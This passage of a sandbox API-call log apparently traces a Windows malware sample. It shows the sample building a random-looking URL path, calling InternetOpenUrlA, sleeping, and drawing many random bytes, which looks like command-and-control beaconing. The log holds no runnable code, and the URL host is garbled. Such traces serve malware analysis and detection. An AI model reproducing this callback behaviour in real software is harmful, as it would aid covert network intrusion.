(HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0218.892] lstrcpyA (in: lpString1=0x472f30, lpString2="P# \x03" | out: lpString1="P# \x03") returned="P# \x03" [0218.892] lstrcatA (in: lpString1="P# \x03", lpString2="/vjY0hy4muwr1b4cb6Hyecjdl0d5sq4wygmqok94/inkUr2a8MUfwgtwzcD31jPlicy/99iacgPLqPgngqeYhOt3o2zs/44qcimHSv0yu0njdd7mn493xi9mXmdeR089sV8/4DmkixntB2azemrzse/" | out: lpString1="P# \x03/vjY0hy4muwr1b4cb6Hyecjdl0d5sq4wygmqok94/inkUr2a8MUfwgtwzcD31jPlicy/99iacgPLqPgngqeYhOt3o2zs/44qcimHSv0yu0njdd7mn493xi9mXmdeR089sV8/4DmkixntB2azemrzse/") returned="P# \x03/vjY0hy4muwr1b4cb6Hyecjdl0d5sq4wygmqok94/inkUr2a8MUfwgtwzcD31jPlicy/99iacgPLqPgngqeYhOt3o2zs/44qcimHSv0yu0njdd7mn493xi9mXmdeR089sV8/4DmkixntB2azemrzse/" [0218.892] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0218.892] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P# \x03/vjY0hy4muwr1b4cb6Hyecjdl0d5sq4wygmqok94/inkUr2a8MUfwgtwzcD31jPlicy/99iacgPLqPgngqeYhOt3o2zs/44qcimHSv0yu0njdd7mn493xi9mXmdeR089sV8/4DmkixntB2azemrzse/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0218.893] GetProcessHeap () returned 0x440000 [0218.893] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0218.893] GetProcessHeap () returned 0x440000 [0218.893] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02350 | out: hHeap=0x440000) returned 1 [0218.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0218.894] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0218.894] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.894] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0218.895] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0218.895] Sleep (dwMilliseconds=0x1400c) [0219.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0219.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.194] GetProcessHeap () returned 0x440000 [0219.194] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4eb0 [0219.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4eb1, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d4eb1) returned 0x0 [0219.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.199] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0219.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.201] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ed7, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x4d4ed7) returned 0x0 [0219.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.202] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.203] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.203] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.204] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.205] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.206] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.207] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ef5, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x4d4ef5) returned 0x0 [0219.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.208] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0219.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.212] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.213] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0219.214] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4f15, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x4d4f15) returned 0x0 [0219.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0219.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0219.215] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 